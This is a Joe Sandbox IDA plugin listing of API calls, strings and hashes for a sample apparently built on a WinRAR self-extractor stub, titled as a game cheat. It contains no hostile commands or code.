                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D19711
                                                    • _free.LIBCMT ref: 00D1971C
                                                    • _free.LIBCMT ref: 00D19727
                                                    • _free.LIBCMT ref: 00D19732
                                                    • _free.LIBCMT ref: 00D1973D
                                                    • _free.LIBCMT ref: 00D19748
                                                    • _free.LIBCMT ref: 00D19753
                                                    • _free.LIBCMT ref: 00D1975E
                                                    • _free.LIBCMT ref: 00D1976C
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 322700389-393685449
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF6FAA
                                                    • _wcslen.LIBCMT ref: 00CF7013
                                                    • _wcslen.LIBCMT ref: 00CF7084
                                                      • Part of subcall function 00CF7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CF7AAB
                                                      • Part of subcall function 00CF7A9C: GetLastError.KERNEL32 ref: 00CF7AF1
                                                      • Part of subcall function 00CF7A9C: CloseHandle.KERNEL32(?), ref: 00CF7B00
                                                    Similarity
                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3122303884-3508440684
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0B610
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D0B637
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D0B650
                                                    • SetWindowTextW.USER32(?,?), ref: 00D0B661
                                                    • GetDlgItem.USER32(?,00000065), ref: 00D0B66A
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D0B67E
                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D0B694
                                                    Similarity
                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                    • String ID: LICENSEDLG
                                                    • API String ID: 3214253823-2177901306
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,6B1316D7,00000001,00000000,00000000,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FD99
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FE14
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00D0FE1F
                                                    • _com_issue_error.COMSUPP ref: 00D0FE48
                                                    • _com_issue_error.COMSUPP ref: 00D0FE52
                                                    • GetLastError.KERNEL32(80070057,6B1316D7,00000001,00000000,00000000,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FE57
                                                    • _com_issue_error.COMSUPP ref: 00D0FE6A
                                                    • GetLastError.KERNEL32(00000000,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FE80
                                                    • _com_issue_error.COMSUPP ref: 00D0FE93
                                                    Similarity
                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 1353541977-0
                                                    APIs
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                    • API String ID: 3519838083-3505469590
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF9387
                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CF93AA
                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CF93C9
                                                      • Part of subcall function 00CFC29A: _wcslen.LIBCMT ref: 00CFC2A2
                                                      • Part of subcall function 00D01FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CFC116,00000000,.exe,?,?,00000800,?,?,?,00D08E3C), ref: 00D01FD1
                                                    • _swprintf.LIBCMT ref: 00CF9465
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CF94D4
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CF9514
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: rtmp%d
                                                    APIs
                                                    • __aulldiv.LIBCMT ref: 00D0122E
                                                      • Part of subcall function 00CFB146: GetVersionExW.KERNEL32(?), ref: 00CFB16B
                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00D01251
                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00D01263
                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D01274
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01284
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01294
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D012CF
                                                    • __aullrem.LIBCMT ref: 00D01379
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                    • String ID:
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CF2536
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                    Strings
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                    • String ID: ;%u$x%u$xc%u
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D1FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00D1F6CF
                                                    • __fassign.LIBCMT ref: 00D1F74A
                                                    • __fassign.LIBCMT ref: 00D1F765
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D1F78B
                                                    • WriteFile.KERNEL32(?,00000000,00000000,00D1FE02,00000000,?,?,?,?,?,?,?,?,?,00D1FE02,00000000), ref: 00D1F7AA
                                                    • WriteFile.KERNEL32(?,00000000,00000001,00D1FE02,00000000,?,?,?,?,?,?,?,?,?,00D1FE02,00000000), ref: 00D1F7E3
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00D12937
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1293F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00D129C8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00D129F3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00D12A48
                                                    Strings
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00D09EEE
                                                    • GetWindowRect.USER32(?,00000000), ref: 00D09F44
                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00D09FDB
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00D09FE3
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00D09FF9
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$Show$RectText
                                                    • String ID: RarHtmlClassName
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    APIs
                                                      • Part of subcall function 00D1C868: _free.LIBCMT ref: 00D1C891
                                                    • _free.LIBCMT ref: 00D1C8F2
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D1C8FD
                                                    • _free.LIBCMT ref: 00D1C908
                                                    • _free.LIBCMT ref: 00D1C95C
                                                    • _free.LIBCMT ref: 00D1C967
                                                    • _free.LIBCMT ref: 00D1C972
                                                    • _free.LIBCMT ref: 00D1C97D
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D0E669,00D0E5CC,00D0E86D), ref: 00D0E605
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D0E61B
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D0E630
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    APIs
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D014C2
                                                      • Part of subcall function 00CFB146: GetVersionExW.KERNEL32(?), ref: 00CFB16B
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D014E6
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D01500
                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D01513
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01523
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01533
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00D12AF1,00D102FC,00D0FA34), ref: 00D12B08
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D12B16
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D12B2F
                                                    • SetLastError.KERNEL32(00000000,00D12AF1,00D102FC,00D0FA34), ref: 00D12B81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: c874d07dcb87efdb443e5ded267c63e9fbcb4c077fb2b4a4889839493b09a7da
                                                    • Instruction ID: bf29c7d3e43de84eda58d0176d9c147392aa0e978b510551f0ad03b369a59354
                                                    • Opcode Fuzzy Hash: c874d07dcb87efdb443e5ded267c63e9fbcb4c077fb2b4a4889839493b09a7da
                                                    • Instruction Fuzzy Hash: 39012F3220C3123EA6242EB47D869FA2F59EB21770B20033AF010822E4EF138D929274
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D31030,00D14674,00D31030,?,?,00D13F73,00000050,?,00D31030,00000200), ref: 00D197E9
                                                    • _free.LIBCMT ref: 00D1981C
                                                    • _free.LIBCMT ref: 00D19844
                                                    • SetLastError.KERNEL32(00000000,?,00D31030,00000200), ref: 00D19851
                                                    • SetLastError.KERNEL32(00000000,?,00D31030,00000200), ref: 00D1985D
                                                    • _abort.LIBCMT ref: 00D19863
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: a2515e9d6efa9a90989728fdcd475ffddd971ef571260cb1212a950329d82a55
                                                    • Instruction ID: 0b7e0b8dbd9a9f7f33c6fb9ecdeaa3e2894f6c6850e3a1696f8230fe949ec130
                                                    • Opcode Fuzzy Hash: a2515e9d6efa9a90989728fdcd475ffddd971ef571260cb1212a950329d82a55
                                                    • Instruction Fuzzy Hash: DDF0F4352007017AC62237287C3AAEB9A65CFE2B31F280128F914D2292EF20C8868575
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D0DC47
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0DC61
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0DC72
                                                    • TranslateMessage.USER32(?), ref: 00D0DC7C
                                                    • DispatchMessageW.USER32(?), ref: 00D0DC86
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D0DC91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 2148572870-0
                                                    • Opcode ID: e34340467cc34ba02f86ef6d2bcf3e095991835205aa5d8202d46a286d9c9b33
                                                    • Instruction ID: b1d3236dc1970e009cfb6f54a77e1decc83958ab36daa4076a67cb8f8fe5a3f1
                                                    • Opcode Fuzzy Hash: e34340467cc34ba02f86ef6d2bcf3e095991835205aa5d8202d46a286d9c9b33
                                                    • Instruction Fuzzy Hash: 2AF03C72A01319BBCB206FA5DD4CECF7F6DEF55792B044411B90AD2194D6748646CBB0
                                                    APIs
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                      • Part of subcall function 00CFB92D: _wcsrchr.LIBVCRUNTIME ref: 00CFB944
                                                    • _wcslen.LIBCMT ref: 00CFC197
                                                    • _wcslen.LIBCMT ref: 00CFC1DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsrchr
                                                    • String ID: .exe$.rar$.sfx
                                                    • API String ID: 3513545583-31770016
                                                    • Opcode ID: c815cfe7b68c65c8ea133814c65a00f11e5d55ffbe479c95fc8b93abd5794d08
                                                    • Instruction ID: f8ef99930faad4ca8cccb5a8f701561d2f1d5cb161aa08f975d917a86e27c60f
                                                    • Opcode Fuzzy Hash: c815cfe7b68c65c8ea133814c65a00f11e5d55ffbe479c95fc8b93abd5794d08
                                                    • Instruction Fuzzy Hash: 1D41362670032DA6C775AF349A82A7F73A4EF41704F10450EFAA56B0C1EB504E96D3B3
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00D0CE9D
                                                      • Part of subcall function 00CFB690: _wcslen.LIBCMT ref: 00CFB696
                                                    • _swprintf.LIBCMT ref: 00D0CED1
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • SetDlgItemTextW.USER32(?,00000066,00D3946A), ref: 00D0CEF1
                                                    • EndDialog.USER32(?,00000001), ref: 00D0CFFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: %s%s%u
                                                    • API String ID: 110358324-1360425832
                                                    • Opcode ID: cf3d3ef25c96ecf1a00b03c41ff3a66a12ca588ab8fb6432e9ef58a15a67975c
                                                    • Instruction ID: 5a4707d03d2a86d6b1b43c31294c02e8f656ce71616aaddd1eb3dc4241a81024
                                                    • Opcode Fuzzy Hash: cf3d3ef25c96ecf1a00b03c41ff3a66a12ca588ab8fb6432e9ef58a15a67975c
                                                    • Instruction Fuzzy Hash: A8418EB1900219AADF25DBA0DC45FEE77BDEB05340F4480A6FA0DE7191EE719A448F72
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CFBB27
                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CFA275,?,?,00000800,?,00CFA23A,?,00CF755C), ref: 00CFBBC5
                                                    • _wcslen.LIBCMT ref: 00CFBC3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CurrentDirectory
                                                    • String ID: UNC$\\?\
                                                    • API String ID: 3341907918-253988292
                                                    • Opcode ID: 0330481b549d17c5b411e608b173aa053d020deb79305f8a28965f8cc4c8c3ca
                                                    • Instruction ID: 9fe52ac3a43475dc8bd5821cb6ce2de672e51873171ae7c9ffdf48fb8d57fc00
                                                    • Opcode Fuzzy Hash: 0330481b549d17c5b411e608b173aa053d020deb79305f8a28965f8cc4c8c3ca
                                                    • Instruction Fuzzy Hash: 7241A23150025DBACB61AF20DC05FFF77A9EF41390F108466FA68A3151DB70DE909AB2
                                                    APIs
                                                    • LoadBitmapW.USER32(00000065), ref: 00D0B6ED
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00D0B712
                                                    • DeleteObject.GDI32(00000000), ref: 00D0B744
                                                    • DeleteObject.GDI32(00000000), ref: 00D0B767
                                                      • Part of subcall function 00D0A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6D5
                                                      • Part of subcall function 00D0A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6EC
                                                      • Part of subcall function 00D0A6C2: LoadResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A703
                                                      • Part of subcall function 00D0A6C2: LockResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A712
                                                      • Part of subcall function 00D0A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D0B73D,00000066), ref: 00D0A72D
                                                      • Part of subcall function 00D0A6C2: GlobalLock.KERNEL32(00000000), ref: 00D0A73E
                                                      • Part of subcall function 00D0A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D0A762
                                                      • Part of subcall function 00D0A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D0A7A7
                                                      • Part of subcall function 00D0A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00D0A7C6
                                                      • Part of subcall function 00D0A6C2: GlobalFree.KERNEL32(00000000), ref: 00D0A7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                    • String ID: ]
                                                    • API String ID: 1797374341-3352871620
                                                    • Opcode ID: 6b6f98cf9d8dc649d34819e42fcf4a6ace72796f7937e6e629954e94df826a4a
                                                    • Instruction ID: 198b4bfeb1bf2722f263a538ee41a95c1d4fe3ba3966f77ecfc8a995987521a8
                                                    • Opcode Fuzzy Hash: 6b6f98cf9d8dc649d34819e42fcf4a6ace72796f7937e6e629954e94df826a4a
                                                    • Instruction Fuzzy Hash: 2501AD36540715A6C7127B789C09BBF7AB9EBC0BA2F090012BD08A72D1DB628D0546B2
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0D64B
                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D0D661
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D0D675
                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00D0D684
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: RENAMEDLG
                                                    • API String ID: 445417207-3299779563
                                                    • Opcode ID: 551d724cd53acf0547596f056bf16b93c488dbc502d0e114edb7eaf5fd5c277b
                                                    • Instruction ID: f3d68c8e3140e536d12dcec213cd73315e9564affae1722ed8cc78a4bfd7cdc2
                                                    • Opcode Fuzzy Hash: 551d724cd53acf0547596f056bf16b93c488dbc502d0e114edb7eaf5fd5c277b
                                                    • Instruction Fuzzy Hash: 4D016833284318BBD2104FF8AD49F6B775EEB9AB42F110012F749E21E4C6A399048735
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D17E24,00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002), ref: 00D17E93
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D17EA6
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00D17E24,00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002), ref: 00D17EC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
